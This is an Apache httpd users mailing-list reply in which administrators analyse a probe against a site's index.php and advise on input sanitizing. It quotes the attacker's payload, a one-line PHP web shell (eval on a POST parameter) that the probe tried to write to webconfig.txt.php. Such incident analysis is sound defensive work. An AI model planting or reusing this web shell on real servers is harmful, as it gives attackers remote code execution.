On 2017-02-06 12:08 pm, Lentes, Bernd wrote:
The first line is trying to create the file webconfig.txt.php in your
DOCUMENT_ROOT directory, with the contents of the file being:
<?php eval($_POST[1]);?>
I didn't decode the remaining lines. I think they're just trying to do
the same
thing.
Fortunately there is no webconfig.txt.php. And all folders in /srv/www
belongs to root and user wwwrun
is not allowed to write there.
What seems to be happening here is that your system is being probed for
vulnerabilities.
The attacker is sending a payload string to your index.php file in hopes
that it will not complain and write the string to the file
webconfig.txt.php which the attacker would then attempt to get to with
the real hack in the Posted contents. Are there any requests to get to
that file?
You should make sure you sanitized any input to your index.php and
reject anything that's not expected.
Ken
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org
